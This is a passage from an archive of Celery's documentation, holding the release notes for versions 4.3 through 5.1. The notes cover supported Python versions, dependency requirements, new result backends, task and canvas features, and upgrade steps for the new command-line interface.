0ustar00asifasif00000000000000.. _whatsnew-4.3: =================================== What's new in Celery 4.3 (rhubarb) =================================== :Author: Omer Katz (``omer.drow at gmail.com``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. Celery is a simple, flexible, and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. 
To read more about Celery you should go read the :ref:`introduction `. While this version is backward compatible with previous versions it's important that you read the following section. This version is officially supported on CPython 2.7, 3.4, 3.5, 3.6 & 3.7 and is also supported on PyPy2 & PyPy3. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 2 Preface ======= The 4.3.0 release continues to improve our efforts to provide you with the best task execution platform for Python. This release has been codenamed `Rhubarb `_ which is one of my favorite tracks from Selected Ambient Works II. This release focuses on new features like new result backends and a revamped security serializer along with bug fixes mainly for Celery Beat, Canvas, a number of critical fixes for hanging workers and fixes for several severe memory leaks. Celery 4.3 is the first release to support Python 3.7. We hope that 4.3 will be the last release to support Python 2.7 as we now begin to work on Celery 5, the next generation of our task execution platform. However, if Celery 5 will be delayed for any reason we may release another 4.x minor version which will still support Python 2.7. If another 4.x version will be released it will most likely drop support for Python 3.4 as it will reach it's EOL in March 2019. We have also focused on reducing contribution friction. Thanks to **Josue Balandrano Coronel**, one of our core contributors, we now have an updated :ref:`contributing` document. If you intend to contribute, please review it at your earliest convenience. I have also added new issue templates, which we will continue to improve, so that the issues you open will have more relevant information which will allow us to help you to resolve them more easily. *— Omer Katz* Wall of Contributors -------------------- Alexander Ioannidis Amir Hossein Saeid Mehr Andrea Rabbaglietti Andrey Skabelin Anthony Ruhier Antonin Delpeuch Artem Vasilyev Asif Saif Uddin (Auvi) aviadatsnyk Axel Haustant Benjamin Pereto Bojan Jovanovic Brett Jackson Brett Randall Brian Schrader Bruno Alla Buddy <34044521+CoffeeExpress@users.noreply.github.com> Charles Chan Christopher Dignam Ciaran Courtney <6096029+ciarancourtney@users.noreply.github.com> Clemens Wolff Colin Watson Daniel Hahler Dash Winterson Derek Harland Dilip Vamsi Moturi <16288600+dilipvamsi@users.noreply.github.com> Dmytro Litvinov Douglas Rohde Ed Morley <501702+edmorley@users.noreply.github.com> Fabian Becker Federico Bond Fengyuan Chen Florian CHARDIN George Psarakis Guilherme Caminha ideascf Itay Jamie Alessio Jason Held Jeremy Cohen John Arnold Jon Banafato Jon Dufresne Joshua Engelman Joshua Schmid Josue Balandrano Coronel K Davis kidoz Kiyohiro Yamaguchi Korijn van Golen Lars Kruse Lars Rinn Lewis M. Kabui madprogrammer Manuel Vázquez Acosta Marcus McHale Mariatta Mario Kostelac Matt Wiens Maximilien Cuony Maximilien de Bayser Meysam Milind Shakya na387 Nicholas Pilon Nick Parsons Nik Molnar Noah Hall Noam Omer Katz Paweł Adamczak peng weikang Prathamesh Salunkhe Przemysław Suliga <1270737+suligap@users.noreply.github.com> Raf Geens (◕ᴥ◕) Robert Kopaczewski Samuel Huang Sebastian Wojciechowski <42519683+sebwoj@users.noreply.github.com> Seunghun Lee Shanavas M Simon Charette Simon Schmidt srafehi Steven Sklar Tom Booth Tom Clancy Toni Ruža tothegump Victor Mireyev Vikas Prasad walterqian Willem Xiaodong yywing <386542536@qq.com> .. 
note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. Upgrading from Celery 4.2 ========================= Please read the important notes below as there are several breaking changes. .. _v430-important: Important Notes =============== Supported Python Versions ------------------------- The supported Python Versions are: - CPython 2.7 - CPython 3.4 - CPython 3.5 - CPython 3.6 - CPython 3.7 - PyPy2.7 6.0 (``pypy2``) - PyPy3.5 6.0 (``pypy3``) Kombu ----- Starting from this release, the minimum required version is Kombu 4.4. New Compression Algorithms ~~~~~~~~~~~~~~~~~~~~~~~~~~ Kombu 4.3 includes a few new optional compression methods: - LZMA (available from stdlib if using Python 3 or from a backported package) - Brotli (available if you install either the brotli or the brotlipy package) - ZStandard (available if you install the zstandard package) Unfortunately our current protocol generates huge payloads for complex canvases. Until we migrate to our 3rd revision of the Celery protocol in Celery 5 which will resolve this issue, please use one of the new compression methods as a workaround. See :ref:`calling-compression` for details. Billiard -------- Starting from this release, the minimum required version is Billiard 3.6. Eventlet Workers Pool --------------------- We now require `eventlet>=0.24.1`. If you are using the eventlet workers pool please install Celery using: .. code-block:: console $ pip install -U celery[eventlet] MessagePack Serializer ---------------------- We've been using the deprecated `msgpack-python` package for a while. This is now fixed as we depend on the `msgpack` instead. If you are currently using the MessagePack serializer please uninstall the previous package and reinstall the new one using: .. code-block:: console $ pip uninstall msgpack-python -y $ pip install -U celery[msgpack] MongoDB Result Backend ----------------------- We now support the `DNS seedlist connection format `_ for the MongoDB result backend. This requires the `dnspython` package. If you are using the MongoDB result backend please install Celery using: .. code-block:: console $ pip install -U celery[mongodb] Redis Message Broker -------------------- Due to multiple bugs in earlier versions of py-redis that were causing issues for Celery, we were forced to bump the minimum required version to 3.2.0. Redis Result Backend -------------------- Due to multiple bugs in earlier versions of py-redis that were causing issues for Celery, we were forced to bump the minimum required version to 3.2.0. Riak Result Backend -------------------- The official Riak client does not support Python 3.7 as of yet. In case you are using the Riak result backend, either attempt to install the client from master or avoid upgrading to Python 3.7 until this matter is resolved. In case you are using the Riak result backend with Python 3.7, we now emit a warning. Please track `basho/riak-python-client#534 `_ for updates. Dropped Support for RabbitMQ 2.x -------------------------------- Starting from this release, we officially no longer support RabbitMQ 2.x. The last release of 2.x was in 2012 and we had to make adjustments to correctly support high availability on RabbitMQ 3.x. If for some reason, you are still using RabbitMQ 2.x we encourage you to upgrade as soon as possible since security patches are no longer applied on RabbitMQ 2.x. 
Django Support -------------- Starting from this release, the minimum required Django version is 1.11. Revamped auth Serializer ------------------------ The auth serializer received a complete overhaul. It was previously horribly broken. We now depend on `cryptography` instead of `pyOpenSSL` for this serializer. See :ref:`message-signing` for details. .. _v430-news: News ==== Brokers ------- Redis Broker Support for SSL URIs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Redis broker now has support for SSL connections. You can use :setting:`broker_use_ssl` as you normally did and use a `rediss://` URI. You can also pass the SSL configuration parameters to the URI: `rediss://localhost:3456?ssl_keyfile=keyfile.key&ssl_certfile=certificate.crt&ssl_ca_certs=ca.pem&ssl_cert_reqs=CERT_REQUIRED` Configurable Events Exchange Name ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Previously, the events exchange name was hardcoded. You can use :setting:`event_exchange` to determine it. The default value remains the same. Configurable Pidbox Exchange Name ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Previously, the Pidbox exchange name was hardcoded. You can use :setting:`control_exchange` to determine it. The default value remains the same. Result Backends --------------- Redis Result Backend Support for SSL URIs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Redis result backend now has support for SSL connections. You can use :setting:`redis_backend_use_ssl` to configure it and use a `rediss://` URI. You can also pass the SSL configuration parameters to the URI: `rediss://localhost:3456?ssl_keyfile=keyfile.key&ssl_certfile=certificate.crt&ssl_ca_certs=ca.pem&ssl_cert_reqs=CERT_REQUIRED` Store Extended Task Metadata in Result ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ When :setting:`result_extended` is `True` the backend will store the following metadata: - Task Name - Arguments - Keyword arguments - The worker the task was executed on - Number of retries - The queue's name or routing key In addition, :meth:`celery.app.task.update_state` now accepts keyword arguments which allows you to store custom data with the result. Encode Results Using A Different Serializer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The :setting:`result_accept_content` setting allows to configure different accepted content for the result backend. A special serializer (`auth`) is used for signed messaging, however the result_serializer remains in json, because we don't want encrypted content in our result backend. To accept unsigned content from the result backend, we introduced this new configuration option to specify the accepted content from the backend. New Result Backends ~~~~~~~~~~~~~~~~~~~ This release introduces four new result backends: - S3 result backend - ArangoDB result backend - Azure Block Blob Storage result backend - CosmosDB result backend S3 Result Backend ~~~~~~~~~~~~~~~~~ Amazon Simple Storage Service (Amazon S3) is an object storage service by AWS. The results are stored using the following path template: | <:setting:`s3_bucket`>/<:setting:`s3_base_path`>/ See :ref:`conf-s3-result-backend` for more information. ArangoDB Result Backend ~~~~~~~~~~~~~~~~~~~~~~~ ArangoDB is a native multi-model database with search capabilities. The backend stores the result in the following document format: | { | _key: {key}, | task: {task} | } See :ref:`conf-arangodb-result-backend` for more information. Azure Block Blob Storage Result Backend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Azure Block Blob Storage is an object storage service by Microsoft. 
The backend stores the result in the following path template: | <:setting:`azureblockblob_container_name`>/ See :ref:`conf-azureblockblob-result-backend` for more information. CosmosDB Result Backend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Azure Cosmos DB is Microsoft's globally distributed, multi-model database service. The backend stores the result in the following document format: | { | id: {key}, | value: {task} | } See :ref:`conf-cosmosdbsql-result-backend` for more information. Tasks ----- Cythonized Tasks ~~~~~~~~~~~~~~~~ Cythonized tasks are now supported. You can generate C code from Cython that specifies a task using the `@task` decorator and everything should work exactly the same. Acknowledging Tasks on Failures or Timeouts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ When :setting:`task_acks_late` is set to `True` tasks are acknowledged on failures or timeouts. This makes it hard to use dead letter queues and exchanges. Celery 4.3 introduces the new :setting:`task_acks_on_failure_or_timeout` which allows you to avoid acknowledging tasks if they failed or timed out even if :setting:`task_acks_late` is set to `True`. :setting:`task_acks_on_failure_or_timeout` is set to `True` by default. Schedules Now Support Microseconds ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ When scheduling tasks using :program:`celery beat` microseconds are no longer ignored. Default Task Priority ~~~~~~~~~~~~~~~~~~~~~ You can now set the default priority of a task using the :setting:`task_default_priority` setting. The setting's value will be used if no priority is provided for a specific task. Tasks Optionally Inherit Parent's Priority ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Setting the :setting:`task_inherit_parent_priority` configuration option to `True` will make Celery tasks inherit the priority of the previous task linked to it. Examples: .. code-block:: python c = celery.chain( add.s(2), # priority=None add.s(3).set(priority=5), # priority=5 add.s(4), # priority=5 add.s(5).set(priority=3), # priority=3 add.s(6), # priority=3 ) .. code-block:: python @app.task(bind=True) def child_task(self): pass @app.task(bind=True) def parent_task(self): child_task.delay() # child_task will also have priority=5 parent_task.apply_async(args=[], priority=5) Canvas ------ Chords can be Executed in Eager Mode ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ When :setting:`task_always_eager` is set to `True`, chords are executed eagerly as well. Configurable Chord Join Timeout ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Previously, :meth:`celery.result.GroupResult.join` had a fixed timeout of 3 seconds. The :setting:`result_chord_join_timeout` setting now allows you to change it. The default remains 3 seconds. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/history/whatsnew-4.4.rst0000664000175000017500000001552700000000000020235 0ustar00asifasif00000000000000.. _whatsnew-4.4: ================================== What's new in Celery 4.4 (Cliffs) ================================== :Author: Asif Saif Uddin (``auvipy at gmail.com``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. Celery is a simple, flexible, and reliable distributed programming framework to process vast amounts of messages, while providing operations with the tools required to maintain a distributed system with python. 
It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is backward compatible with previous versions it's important that you read the following section. This version is officially supported on CPython 2.7, 3.5, 3.6, 3.7 & 3.8 and is also supported on PyPy2 & PyPy3. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 2 Preface ======= The 4.4.0 release continues to improve our efforts to provide you with the best task execution platform for Python. This release has been codenamed `Cliffs `_ which is one of my favorite tracks. This release focuses on mostly bug fixes and usability improvement for developers. Many long standing bugs, usability issues, documentation issues & minor enhancement issues were squashed which improve the overall developers experience. Celery 4.4 is the first release to support Python 3.8 & pypy36-7.2. As we now begin to work on Celery 5, the next generation of our task execution platform, at least another 4.x is expected before Celery 5 stable release & will get support for at least 1 years depending on community demand and support. We have also focused on reducing contribution friction and updated the contributing tools. *— Asif Saif Uddin* Wall of Contributors -------------------- .. note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. Upgrading from Celery 4.3 ========================= Please read the important notes below as there are several breaking changes. .. _v440-important: Important Notes =============== Supported Python Versions ------------------------- The supported Python Versions are: - CPython 2.7 - CPython 3.5 - CPython 3.6 - CPython 3.7 - CPython 3.8 - PyPy2.7 7.2 (``pypy2``) - PyPy3.5 7.1 (``pypy3``) - PyPy3.6 7.2 (``pypy3``) Dropped support for Python 3.4 ------------------------------ Celery now requires either Python 2.7 or Python 3.5 and above. Python 3.4 has reached EOL in March 2019. In order to focus our efforts we have dropped support for Python 3.4 in this version. If you still require to run Celery using Python 3.4 you can still use Celery 4.3. However we encourage you to upgrade to a supported Python version since no further security patches will be applied for Python 3.4. Kombu ----- Starting from this release, the minimum required version is Kombu 4.6.6. Billiard -------- Starting from this release, the minimum required version is Billiard 3.6.1. Redis Message Broker -------------------- Due to multiple bugs in earlier versions of redis-py that were causing issues for Celery, we were forced to bump the minimum required version to 3.3.0. Redis Result Backend -------------------- Due to multiple bugs in earlier versions of redis-py that were causing issues for Celery, we were forced to bump the minimum required version to 3.3.0. DynamoDB Result Backend ----------------------- The DynamoDB result backend has gained TTL support. As a result the minimum boto3 version was bumped to 1.9.178 which is the first version to support TTL for DynamoDB. 
S3 Results Backend ------------------ To keep up with the current AWS API changes the minimum boto3 version was bumped to 1.9.125. SQS Message Broker ------------------ To keep up with the current AWS API changes the minimum boto3 version was bumped to 1.9.125. Configuration -------------- `CELERY_TASK_RESULT_EXPIRES` has been replaced with `CELERY_RESULT_EXPIRES`. .. _v440-news: News ==== Task Pools ---------- Threaded Tasks Pool ~~~~~~~~~~~~~~~~~~~ We reintroduced a threaded task pool using `concurrent.futures.ThreadPoolExecutor`. The previous threaded task pool was experimental. In addition it was based on the `threadpool `_ package which is obsolete. You can use the new threaded task pool by setting :setting:`worker_pool` to 'threads` or by passing `--pool threads` to the `celery worker` command. Result Backends --------------- ElasticSearch Results Backend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP Basic Authentication Support +++++++++++++++++++++++++++++++++ You can now use HTTP Basic Authentication when using the ElasticSearch result backend by providing the username and the password in the URI. Previously, they were ignored and only unauthenticated requests were issued. MongoDB Results Backend ~~~~~~~~~~~~~~~~~~~~~~~ Support for Authentication Source and Authentication Method +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ You can now specify the authSource and authMethod for the MongoDB using the URI options. The following URI does just that: ``mongodb://user:password@example.com/?authSource=the_database&authMechanism=SCRAM-SHA-256`` Refer to the `documentation `_ for details about the various options. Tasks ------ Task class definitions can now have retry attributes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can now use `autoretry_for`, `retry_kwargs`, `retry_backoff`, `retry_backoff_max` and `retry_jitter` in class-based tasks: .. code-block:: python class BaseTaskWithRetry(Task): autoretry_for = (TypeError,) retry_kwargs = {'max_retries': 5} retry_backoff = True retry_backoff_max = 700 retry_jitter = False Canvas ------ Replacing Tasks Eagerly ~~~~~~~~~~~~~~~~~~~~~~~ You can now call `self.replace()` on tasks which are run eagerly. They will work exactly the same as tasks which are run asynchronously. Chaining Groups ~~~~~~~~~~~~~~~ Chaining groups no longer result in a single group. The following used to join the two groups into one. Now they correctly execute one after another:: >>> result = group(add.si(1, 2), add.si(1, 2)) | group(tsum.s(), tsum.s()).delay() >>> result.get() [6, 6] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/whatsnew-5.0.rst0000664000175000017500000002531500000000000020226 0ustar00asifasif00000000000000.. _whatsnew-5.0: ======================================= What's new in Celery 5.0 (singularity) ======================================= :Author: Omer Katz (``omer.drow at gmail.com``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. Celery is a simple, flexible, and reliable distributed programming framework to process vast amounts of messages, while providing operations with the tools required to maintain a distributed system with python. It's a task queue with focus on real-time processing, while also supporting task scheduling. 
Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is **mostly** backward compatible with previous versions it's important that you read the following section as this release is a new major version. This version is officially supported on CPython 3.6, 3.7 & 3.8 and is also supported on PyPy3. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 2 Preface ======= The 5.0.0 release is a new major release for Celery. Starting from now users should expect more frequent releases of major versions as we move fast and break things to bring you even better experience. Releases in the 5.x series are codenamed after songs of `Jon Hopkins `_. This release has been codenamed `Singularity `_. This version drops support for Python 2.7.x which has reached EOL in January 1st, 2020. This allows us, the maintainers to focus on innovating without worrying for backwards compatibility. From now on we only support Python 3.6 and above. We will maintain compatibility with Python 3.6 until it's EOL in December, 2021. *— Omer Katz* Long Term Support Policy ------------------------ As we'd like to provide some time for you to transition, we're designating Celery 4.x an LTS release. Celery 4.x will be supported until the 1st of August, 2021. We will accept and apply patches for bug fixes and security issues. However, no new features will be merged for that version. Celery 5.x **is not** an LTS release. We will support it until the release of Celery 6.x. We're in the process of defining our Long Term Support policy. Watch the next "What's New" document for updates. Wall of Contributors -------------------- Artem Vasilyev Ash Berlin-Taylor Asif Saif Uddin (Auvi) Asif Saif Uddin Christian Clauss Germain Chazot Harry Moreno kevinbai Martin Paulus Matus Valo Matus Valo maybe-sybr <58414429+maybe-sybr@users.noreply.github.com> Omer Katz Patrick Cloke qiaocc Thomas Grainger Weiliang Li .. note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. Upgrading from Celery 4.x ========================= Step 1: Adjust your command line invocation ------------------------------------------- Celery 5.0 introduces a new CLI implementation which isn't completely backwards compatible. The global options can no longer be positioned after the sub-command. Instead, they must be positioned as an option for the `celery` command like so:: celery --app path.to.app worker If you were using our :ref:`daemonizing` guide to deploy Celery in production, you should revisit it for updates. Step 2: Update your configuration with the new setting names ------------------------------------------------------------ If you haven't already updated your configuration when you migrated to Celery 4.0, please do so now. We elected to extend the deprecation period until 6.0 since we did not loudly warn about using these deprecated settings. Please refer to the :ref:`migration guide ` for instructions. Step 3: Read the important notes in this document ------------------------------------------------- Make sure you are not affected by any of the important upgrade notes mentioned in the :ref:`following section `. 
Step 3: Read the important notes in this document
--------------------------------------------------

Make sure you are not affected by any of the important upgrade notes mentioned in the :ref:`following section `.

You should mainly verify that none of the breaking changes in the CLI affect you. Please refer to :ref:`New Command Line Interface ` for details.

Step 4: Migrate your code to Python 3
-------------------------------------

Celery 5.0 supports only Python 3. Therefore, you must ensure your code is compatible with Python 3.

If you haven't ported your code to Python 3, you must do so before upgrading.

You can use tools like `2to3 `_ and `pyupgrade `_ to assist you with this effort.

After the migration is done, run your test suite with Celery 4 to ensure nothing has been broken.

Step 5: Upgrade to Celery 5.0
-----------------------------

At this point you can upgrade your workers and clients with the new version.

.. _v500-important:

Important Notes
===============

Supported Python Versions
-------------------------

The supported Python versions are:

- CPython 3.6
- CPython 3.7
- CPython 3.8
- PyPy3.6 7.2 (``pypy3``)

Dropped support for Python 2.7 & 3.5
------------------------------------

Celery now requires Python 3.6 and above.

Python 2.7 reached EOL in January 2020. In order to focus our efforts we have dropped support for Python 2.7 in this version.

In addition, Python 3.5 reached EOL in September 2020. Therefore, we are also dropping support for Python 3.5.

If you still need to run Celery on Python 2.7 or Python 3.5, you can still use Celery 4.x. However, we encourage you to upgrade to a supported Python version, since no further security patches will be applied for Python 2.7, and Python 3.5 is likewise no longer supported.

Kombu
-----

Starting from this release, the minimum required version is Kombu 5.0.0.

Billiard
--------

Starting from this release, the minimum required version is Billiard 3.6.3.

Eventlet Workers Pool
---------------------

Due to `eventlet/eventlet#526 `_ the minimum required version is eventlet 0.26.1.

Gevent Workers Pool
-------------------

Starting from this release, the minimum required version is gevent 1.0.0.

Couchbase Result Backend
------------------------

The Couchbase result backend now uses the V3 Couchbase SDK. As a result, we no longer support Couchbase Server 5.x.

Also, starting from this release, the minimum required version for the database client is couchbase 3.0.0.

To verify that your Couchbase Server is compatible with the V3 SDK, please refer to their `documentation `_.

Riak Result Backend
-------------------

The Riak result backend has been removed as the database is no longer maintained.

The Python client only supports Python 3.6 and below, which prevents us from supporting it, and it is also unmaintained.

If you are still using Riak, refrain from upgrading to Celery 5.0 while you migrate your application to a different database.

We apologize for the lack of notice in advance, but we feel that the chance you'll be affected by this breaking change is minimal, which is why we did it.

AMQP Result Backend
-------------------

The AMQP result backend has been removed as it was deprecated in version 4.0.

Removed Deprecated Modules
--------------------------

The `celery.utils.encoding` and the `celery.task` modules were deprecated in version 4.0 and are therefore removed in 5.0.

If you were using the `celery.utils.encoding` module before, you should import `kombu.utils.encoding` instead.

If you were using the `celery.task` module before, you should import directly from the `celery` module instead.

If you were using `from celery.task import Task` you should use `from celery import Task` instead.

If you were using the `celery.task` decorator you should use `celery.shared_task` instead.
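A minimal sketch of these import changes; ``safe_repr`` is used here merely as one example of a helper that moved to Kombu:

.. code-block:: python

    # Before (Celery 4.x):
    #   from celery.task import Task, task
    #   from celery.utils.encoding import safe_repr

    # After (Celery 5.0):
    from celery import Task, shared_task
    from kombu.utils.encoding import safe_repr

    @shared_task
    def ping():
        return 'pong'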
.. _new_command_line_interface:

New Command Line Interface
--------------------------

The command line interface has been revamped using Click. As a result, a few breaking changes have been introduced:

- Postfix global options like `celery worker --app path.to.app` or `celery worker --workdir /path/to/workdir` are no longer supported. You should specify them as part of the global options of the main celery command.
- :program:`celery amqp` and :program:`celery shell` require the `repl` sub command to start a shell. You can now also invoke specific commands without a shell. Type `celery amqp --help` or `celery shell --help` for details.
- The API for adding user options has changed. Refer to the :ref:`documentation ` for details.

Click provides shell completion `out of the box `_. This functionality replaces our previous bash completion script and adds completion support for the zsh and fish shells.

The bash completion script was exported to `extras/celery.bash `_ for the packager's convenience.

Pytest Integration
------------------

Starting from Celery 5.0, the pytest plugin is no longer enabled by default. Please refer to the :ref:`documentation ` for instructions.

Ordered Group Results for the Redis Result Backend
--------------------------------------------------

Previously group results were not ordered by their invocation order. Celery 4.4.7 introduced an opt-in feature to make them ordered. It is now an opt-out behavior.

If you were previously using the Redis result backend, you might need to opt out of this behavior. Please refer to the :ref:`documentation ` for instructions on how to disable this feature.

.. _v500-news:

News
====

Retry Policy for the Redis Result Backend
-----------------------------------------

The retry policy for the Redis result backend is now exposed through the result backend transport options. Please refer to the :ref:`documentation ` for details.
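A minimal configuration sketch of what this can look like; the ``retry_policy`` keys follow Kombu's retry-policy format and the values shown are only illustrative:

.. code-block:: python

    result_backend = 'redis://localhost:6379/0'

    result_backend_transport_options = {
        'retry_policy': {
            'timeout': 5.0,  # give up retrying the backend operation after 5s
        },
    }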
celery-5.2.3/docs/history/whatsnew-5.1.rst

.. _whatsnew-5.1:

=========================================
 What's new in Celery 5.1 (Sun Harmonics)
=========================================
:Author: Josue Balandrano Coronel (``jbc at rmcomplexity.com``)

.. sidebar:: Change history

    What's new documents describe the changes in major versions; we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section.

Celery is a simple, flexible, and reliable distributed programming framework to process vast amounts of messages, while providing operations with the tools required to maintain a distributed system with Python.

It's a task queue with a focus on real-time processing, while also supporting task scheduling.

Celery has a large and diverse community of users and contributors; you should come join us :ref:`on IRC ` or :ref:`our mailing-list `.

To read more about Celery you should go read the :ref:`introduction `.

While this version is **mostly** backward compatible with previous versions, it's important that you read the following section as this release is a new major version.

This version is officially supported on CPython 3.6, 3.7, 3.8 & 3.9 and is also supported on PyPy3.

.. _`website`: http://celeryproject.org/

.. topic:: Table of Contents

    Make sure you read the important notes before upgrading to this version.

.. contents::
    :local:
    :depth: 2

Preface
=======

The 5.1.0 release is a new minor release for Celery.

Starting from now users should expect more frequent releases of major versions as we move fast and break things to bring you an even better experience.

Releases in the 5.x series are codenamed after songs of `Jon Hopkins `_. This release has been codenamed `Sun Harmonics `_.

From now on we only support Python 3.6 and above. We will maintain compatibility with Python 3.6 until its EOL in December 2021.

*— Omer Katz*

Long Term Support Policy
------------------------

As we'd like to provide some time for you to transition, we're designating Celery 4.x an LTS release. Celery 4.x will be supported until the 1st of August, 2021.

We will accept and apply patches for bug fixes and security issues. However, no new features will be merged for that version.

Celery 5.x **is not** an LTS release. We will support it until the release of Celery 6.x.

We're in the process of defining our Long Term Support policy. Watch the next "What's New" document for updates.

Wall of Contributors
--------------------

0xflotus <0xflotus@gmail.com> AbdealiJK Anatoliy Anna Borzenko aruseni Asif Saif Uddin (Auvi) Asif Saif Uddin Awais Qureshi careljonkhout Christian Clauss danthegoodman1 Dave Johansen David Schneider Fahmi Felix Yan Gabriel Augendre galcohen gal cohen Geunsik Lim Guillaume DE SUSANNE D'EPINAY Hilmar Hilmarsson Illia Volochii jenhaoyang Jonathan Stoppani Josue Balandrano Coronel kosarchuksn Kostya Deev Matt Hoffman Matus Valo Myeongseok Seo Noam Omer Katz pavlos kallis Pavol Plaskoň Pengjie Song (宋鹏捷) Sardorbek Imomaliev Sergey Lyapustin Sergey Tikhonov Stephen J. Fuhry Swen Kooij tned73 Tomas Hrnciar tumb1er

.. note::

    This wall was automatically generated from git history, so sadly it doesn't include the people who help with more important things like answering mailing-list questions.

Upgrading from Celery 4.x
=========================

Step 1: Adjust your command line invocation
-------------------------------------------

Celery 5.0 introduces a new CLI implementation which isn't completely backwards compatible.

The global options can no longer be positioned after the sub-command. Instead, they must be positioned as an option for the `celery` command like so::

    celery --app path.to.app worker

If you were using our :ref:`daemonizing` guide to deploy Celery in production, you should revisit it for updates.

Step 2: Update your configuration with the new setting names
-------------------------------------------------------------

If you haven't already updated your configuration when you migrated to Celery 4.0, please do so now.

We elected to extend the deprecation period until 6.0 since we did not loudly warn about using these deprecated settings.

Please refer to the :ref:`migration guide ` for instructions.

Step 3: Read the important notes in this document
--------------------------------------------------

Make sure you are not affected by any of the important upgrade notes mentioned in the :ref:`following section `.

You should verify that none of the breaking changes in the CLI affect you. Please refer to :ref:`New Command Line Interface ` for details.

Step 4: Migrate your code to Python 3
-------------------------------------

Celery 5.x only supports Python 3. Therefore, you must ensure your code is compatible with Python 3.

If you haven't ported your code to Python 3, you must do so before upgrading.
You can use tools like `2to3 `_ and `pyupgrade `_ to assist you with this effort.

After the migration is done, run your test suite with Celery 4 to ensure nothing has been broken.

Step 5: Upgrade to Celery 5.1
-----------------------------

At this point you can upgrade your workers and clients with the new version.

.. _v510-important:

Important Notes
===============

Supported Python Versions
-------------------------

The supported Python versions are:

- CPython 3.6
- CPython 3.7
- CPython 3.8
- CPython 3.9
- PyPy3.6 7.2 (``pypy3``)

Important Notes
---------------

Kombu
~~~~~

Starting from v5.1, the minimum required version is Kombu 5.1.0.

Billiard
~~~~~~~~

Starting from v5.1, the minimum required version is Billiard 3.6.4.

Important Notes From 5.0
------------------------

Dropped support for Python 2.7 & 3.5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Celery now requires Python 3.6 and above.

Python 2.7 reached EOL in January 2020. In order to focus our efforts we have dropped support for Python 2.7 in this version.

In addition, Python 3.5 reached EOL in September 2020. Therefore, we are also dropping support for Python 3.5.

If you still need to run Celery on Python 2.7 or Python 3.5, you can still use Celery 4.x. However, we encourage you to upgrade to a supported Python version, since no further security patches will be applied for Python 2.7 or Python 3.5.

Eventlet Workers Pool
~~~~~~~~~~~~~~~~~~~~~

Due to `eventlet/eventlet#526 `_ the minimum required version is eventlet 0.26.1.

Gevent Workers Pool
~~~~~~~~~~~~~~~~~~~

Starting from v5.0, the minimum required version is gevent 1.0.0.

Couchbase Result Backend
~~~~~~~~~~~~~~~~~~~~~~~~

The Couchbase result backend now uses the V3 Couchbase SDK. As a result, we no longer support Couchbase Server 5.x.

Also, starting from v5.0, the minimum required version for the database client is couchbase 3.0.0.

To verify that your Couchbase Server is compatible with the V3 SDK, please refer to their `documentation `_.

Riak Result Backend
~~~~~~~~~~~~~~~~~~~

The Riak result backend has been removed as the database is no longer maintained.

The Python client only supports Python 3.6 and below, which prevents us from supporting it, and it is also unmaintained.

If you are still using Riak, refrain from upgrading to Celery 5.0 while you migrate your application to a different database.

We apologize for the lack of notice in advance, but we feel that the chance you'll be affected by this breaking change is minimal, which is why we did it.

AMQP Result Backend
~~~~~~~~~~~~~~~~~~~

The AMQP result backend has been removed as it was deprecated in version 4.0.

Removed Deprecated Modules
~~~~~~~~~~~~~~~~~~~~~~~~~~

The `celery.utils.encoding` and the `celery.task` modules were deprecated in version 4.0 and are therefore removed in 5.0.

If you were using the `celery.utils.encoding` module before, you should import `kombu.utils.encoding` instead.

If you were using the `celery.task` module before, you should import directly from the `celery` module instead.

